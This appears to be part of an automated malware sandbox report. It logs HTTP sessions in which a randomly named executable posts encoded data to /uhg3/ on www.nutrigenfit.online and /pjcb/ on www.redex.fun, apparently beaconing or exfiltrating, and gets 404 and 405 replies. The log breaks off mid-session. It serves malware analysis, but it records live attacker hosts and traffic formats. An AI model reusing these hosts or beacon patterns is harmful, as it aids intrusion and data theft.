                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              29192.168.2.449369195.110.124.133803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:50.677325010 CET801OUTPOST /uhg3/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.nutrigenfit.online
                                                                                                                              Origin: http://www.nutrigenfit.online
                                                                                                                              Referer: http://www.nutrigenfit.online/uhg3/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 4d 61 4d 32 2f 61 39 47 79 31 63 62 4f 4f 55 49 47 6a 43 77 4e 49 5a 49 2f 73 4a 6e 41 68 31 72 43 38 37 63 30 51 4c 6b 63 41 42 4c 4b 64 36 6d 75 55 61 52 5a 53 64 55 63 36 2f 2f 58 63 46 37 79 6a 66 71 6c 5a 74 79 67 6b 46 63 78 55 45 2f 4e 77 55 46 68 57 53 5a 58 35 39 77 39 75 45 56 36 44 42 69 69 43 2b 7a 6f 2b 65 79 7a 66 46 6d 41 4d 44 77 66 70 36 79 79 66 59 35 32 68 42 72 39 34 42 32 49 47 73 46 57 49 61 35 30 4e 74 72 70 6e 31 6b 64 69 67 79 48 4e 33 30 77 2b 52 6f 67 68 4d 6e 30 6d 6d 43 7a 47 45 54 42 76 48 59 34 4b 42 6b 49 35 72 2f 77 36 58 4e 58 6a 36 49 4e 77 3d 3d
                                                                                                                              Data Ascii: Z0WTZ=MaM2/a9Gy1cbOOUIGjCwNIZI/sJnAh1rC87c0QLkcABLKd6muUaRZSdUc6//XcF7yjfqlZtygkFcxUE/NwUFhWSZX59w9uEV6DBiiC+zo+eyzfFmAMDwfp6yyfY52hBr94B2IGsFWIa50Ntrpn1kdigyHN30w+RoghMn0mmCzGETBvHY4KBkI5r/w6XNXj6INw==
                                                                                                                              Nov 2, 2024 08:13:51.542506933 CET367INHTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:51 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              30192.168.2.449370195.110.124.133803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:53.227554083 CET821OUTPOST /uhg3/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.nutrigenfit.online
                                                                                                                              Origin: http://www.nutrigenfit.online
                                                                                                                              Referer: http://www.nutrigenfit.online/uhg3/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 4d 61 4d 32 2f 61 39 47 79 31 63 62 4f 76 45 49 57 77 71 77 46 49 5a 58 77 4d 4a 6e 5a 78 31 76 43 38 33 63 30 53 36 2f 64 32 52 4c 4b 38 4b 6d 76 51 4f 52 56 79 64 55 53 61 2f 41 5a 38 45 33 79 69 6a 39 6c 64 78 79 67 6c 68 63 78 56 30 2f 4e 42 55 45 6e 47 53 4d 66 5a 39 79 6a 65 45 56 36 44 42 69 69 44 61 56 6f 36 79 79 7a 76 31 6d 41 70 33 7a 58 4a 36 7a 31 66 59 35 39 42 42 76 39 34 41 52 49 44 52 75 57 4b 69 35 30 4e 64 72 6f 7a 42 6a 54 69 67 30 61 64 32 65 36 64 6f 48 6d 67 74 76 33 31 44 73 32 32 51 71 4e 4a 4b 43 70 37 67 7a 61 35 50 4d 74 39 65 35 61 67 48 42 57 34 7a 2f 34 58 41 48 6f 58 39 53 63 72 41 65 58 64 48 30 59 43 77 3d
                                                                                                                              Data Ascii: Z0WTZ=MaM2/a9Gy1cbOvEIWwqwFIZXwMJnZx1vC83c0S6/d2RLK8KmvQORVydUSa/AZ8E3yij9ldxyglhcxV0/NBUEnGSMfZ9yjeEV6DBiiDaVo6yyzv1mAp3zXJ6z1fY59BBv94ARIDRuWKi50NdrozBjTig0ad2e6doHmgtv31Ds22QqNJKCp7gza5PMt9e5agHBW4z/4XAHoX9ScrAeXdH0YCw=
                                                                                                                              Nov 2, 2024 08:13:54.087502003 CET367INHTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:53 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              31192.168.2.449371195.110.124.133803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:55.786317110 CET10903OUTPOST /uhg3/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.nutrigenfit.online
                                                                                                                              Origin: http://www.nutrigenfit.online
                                                                                                                              Referer: http://www.nutrigenfit.online/uhg3/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 4d 61 4d 32 2f 61 39 47 79 31 63 62 4f 76 45 49 57 77 71 77 46 49 5a 58 77 4d 4a 6e 5a 78 31 76 43 38 33 63 30 53 36 2f 64 32 5a 4c 4c 4b 65 6d 75 79 6d 52 55 79 64 55 61 36 2f 42 5a 38 45 36 79 6a 4b 56 6c 61 34 4a 67 6e 70 63 78 33 73 2f 4c 79 4d 45 75 47 53 4d 54 35 39 2f 39 75 45 4d 36 44 52 75 69 43 71 56 6f 36 79 79 7a 70 5a 6d 4a 63 44 7a 52 4a 36 79 79 66 59 31 32 68 42 58 39 37 78 75 49 43 42 59 52 35 71 35 33 70 35 72 75 47 31 6a 62 69 67 32 5a 64 32 47 36 63 55 59 6d 67 68 4a 33 30 6d 33 32 30 4d 71 4f 34 54 32 39 4b 67 49 41 4a 72 30 79 36 71 71 57 68 50 43 65 35 4f 47 34 43 55 64 38 30 4e 48 59 72 73 57 4d 2b 72 6f 4c 32 46 75 65 52 6a 6d 50 46 77 4e 6e 59 75 41 48 77 55 69 4e 56 4e 50 78 4c 32 33 50 52 46 65 6c 75 39 36 61 7a 78 50 68 6d 61 4c 6e 64 52 77 62 64 39 66 6a 6a 4c 4e 64 70 79 79 7a 4b 50 62 78 78 44 76 64 44 58 79 4d 58 67 71 75 46 31 48 49 56 69 76 6d 36 65 51 38 76 31 2f 79 39 6c 59 77 38 38 62 4a 30 6e 32 2f 61 4d 36 65 38 6e 62 4c 35 58 39 33 4c 4a 75 [TRUNCATED]
                                                                                                                              Data Ascii: Z0WTZ=MaM2/a9Gy1cbOvEIWwqwFIZXwMJnZx1vC83c0S6/d2ZLLKemuymRUydUa6/BZ8E6yjKVla4Jgnpcx3s/LyMEuGSMT59/9uEM6DRuiCqVo6yyzpZmJcDzRJ6yyfY12hBX97xuICBYR5q53p5ruG1jbig2Zd2G6cUYmghJ30m320MqO4T29KgIAJr0y6qqWhPCe5OG4CUd80NHYrsWM+roL2FueRjmPFwNnYuAHwUiNVNPxL23PRFelu96azxPhmaLndRwbd9fjjLNdpyyzKPbxxDvdDXyMXgquF1HIVivm6eQ8v1/y9lYw88bJ0n2/aM6e8nbL5X93LJuedYuKvWhfEongmfOuX+TPvKwnAdKwjDrwKIDebni7Yrr8VWT1eoE4TS+I6bKTVt1W3yAruQfoRDmdq6F9h5s19rwIitzu8ILrw8I7/xqnYXxrPi0ln78SiGKdFqoRXKrDujFAMN19tBpm+S0jr38kB0pSblxpFVUCQYa0b2BlVMSVL3j2tviILX8i6Aqxb2Tx/iWDX+BxtK6rNYOgn1r76P3sTkuAMrOwCpQkQBuyqfE+ZkrTzoYhIuyPya/SL0XF6vcYugBrT6NqhB7UjHFLGB46wJmgg77kJLjPpGRb6P/uf0jEMUhx0j0EIrKfdlP/qDDmESq/+G2xiVFsZ5dKJksJgwbA7ThZVp4WqoVzJJvGH/26unFqe1Q37tVKq7tS8akGpKmvMFsxqKTIPJGRVNtGbJpqAeThRyptQSGdOGHIK3e7K57U4s9rNLv+deUQ9flkUxLsrLCr4VL/Ll9/7kJSVbT1lzIwFP6Cdzn+pMxIlMNcoWPr9aNJ94lNSrzHrlXR3tTBYLs01F0qhj1SlRBjIwSPRCCHse4Q2MC6fz73eIIOj29qe3+BcGP94SP7C7qMo1B+SMiyZ/6ajlA3+a8qhJkXwr/1eynXuu03NHdgBnVi70nnOjfTj7TYmT4RRk06IkZq1csGKdVqS5uUXJWmtgWeUKA6K [TRUNCATED]
                                                                                                                              Nov 2, 2024 08:13:56.643089056 CET367INHTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:56 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              32192.168.2.449372195.110.124.133803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:58.333332062 CET531OUTGET /uhg3/?Z0WTZ=BYkW8sJ9y3cOHNEoRxCwA5Vo4ahPFjBVLPr9x2y6ZT42IcqGpiutRD9HR4qSfel6nhfbupoEu3BM2yJdNDd6onHQNeQ4qPh2tk8usD30jryO8epkJ7XZGNI=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.nutrigenfit.online
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:13:59.174343109 CET367INHTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:13:59 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              33192.168.2.449373185.68.16.94803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:14:04.413924932 CET774OUTPOST /pjcb/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.redex.fun
                                                                                                                              Origin: http://www.redex.fun
                                                                                                                              Referer: http://www.redex.fun/pjcb/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 72 54 51 56 4f 45 74 2f 75 58 2b 2b 42 76 75 78 67 68 5a 6b 64 77 6d 31 52 66 2f 6a 65 6e 43 78 50 62 58 4e 41 71 33 50 64 48 44 63 53 78 33 64 2f 44 75 74 6f 34 50 6a 4c 73 58 7a 6d 48 69 59 68 71 44 71 32 6c 51 64 42 67 55 5a 53 69 42 4e 30 31 30 37 6d 47 42 2b 64 38 74 31 6e 35 46 6d 6c 4f 39 76 4f 2f 41 59 44 42 75 39 63 33 36 6d 78 72 32 31 58 70 42 68 37 44 4b 74 6c 45 41 73 2f 48 6e 62 71 4c 2f 77 5a 47 55 73 36 45 37 57 39 4d 37 66 70 54 2b 43 78 6b 75 2b 6e 7a 41 57 6f 6e 38 48 37 51 52 51 51 34 54 49 76 56 52 6a 45 32 38 62 5a 39 32 62 52 34 62 30 79 4d 37 4a 4a 41 3d 3d
                                                                                                                              Data Ascii: Z0WTZ=rTQVOEt/uX++BvuxghZkdwm1Rf/jenCxPbXNAq3PdHDcSx3d/Duto4PjLsXzmHiYhqDq2lQdBgUZSiBN0107mGB+d8t1n5FmlO9vO/AYDBu9c36mxr21XpBh7DKtlEAs/HnbqL/wZGUs6E7W9M7fpT+Cxku+nzAWon8H7QRQQ4TIvVRjE28bZ92bR4b0yM7JJA==
                                                                                                                              Nov 2, 2024 08:14:05.317828894 CET332INHTTP/1.1 405 Not Allowed
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:14:05 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              x-ray: p529:0.000
                                                                                                                              Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              34192.168.2.449374185.68.16.94803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:14:06.965349913 CET794OUTPOST /pjcb/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.redex.fun
                                                                                                                              Origin: http://www.redex.fun
                                                                                                                              Referer: http://www.redex.fun/pjcb/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 72 54 51 56 4f 45 74 2f 75 58 2b 2b 44 50 65 78 6d 43 42 6b 62 51 6d 79 65 2f 2f 6a 48 33 44 5a 50 62 4c 4e 41 6f 61 4b 64 30 6e 63 53 54 2f 64 2b 42 4b 74 70 34 50 6a 53 63 58 79 72 6e 69 44 68 71 50 69 32 6c 63 64 42 67 41 5a 53 6d 52 4e 31 46 49 30 6e 57 42 38 49 73 74 72 6a 35 46 6d 6c 4f 39 76 4f 2b 6c 39 44 42 6d 39 63 44 47 6d 67 36 32 32 57 70 42 69 38 44 4b 74 75 6b 41 6f 2f 48 6e 35 71 4b 54 4f 5a 41 59 73 36 46 4c 57 38 64 37 63 2b 44 2b 45 79 55 76 32 6a 69 39 2f 6f 58 42 37 31 53 49 31 64 4c 53 76 75 54 63 35 56 48 64 4d 4c 39 53 6f 4d 2f 53 41 2f 50 47 41 53 4f 72 63 79 31 44 67 77 57 6a 4a 48 4f 61 72 7a 71 6f 69 4f 75 51 3d
                                                                                                                              Data Ascii: Z0WTZ=rTQVOEt/uX++DPexmCBkbQmye//jH3DZPbLNAoaKd0ncST/d+BKtp4PjScXyrniDhqPi2lcdBgAZSmRN1FI0nWB8Istrj5FmlO9vO+l9DBm9cDGmg622WpBi8DKtukAo/Hn5qKTOZAYs6FLW8d7c+D+EyUv2ji9/oXB71SI1dLSvuTc5VHdML9SoM/SA/PGASOrcy1DgwWjJHOarzqoiOuQ=
                                                                                                                              Nov 2, 2024 08:14:07.875579119 CET332INHTTP/1.1 405 Not Allowed
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:14:07 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              x-ray: p529:0.000
                                                                                                                              Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              35192.168.2.449375185.68.16.94803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:14:09.509880066 CET10876OUTPOST /pjcb/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.redex.fun
                                                                                                                              Origin: http://www.redex.fun
                                                                                                                              Referer: http://www.redex.fun/pjcb/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
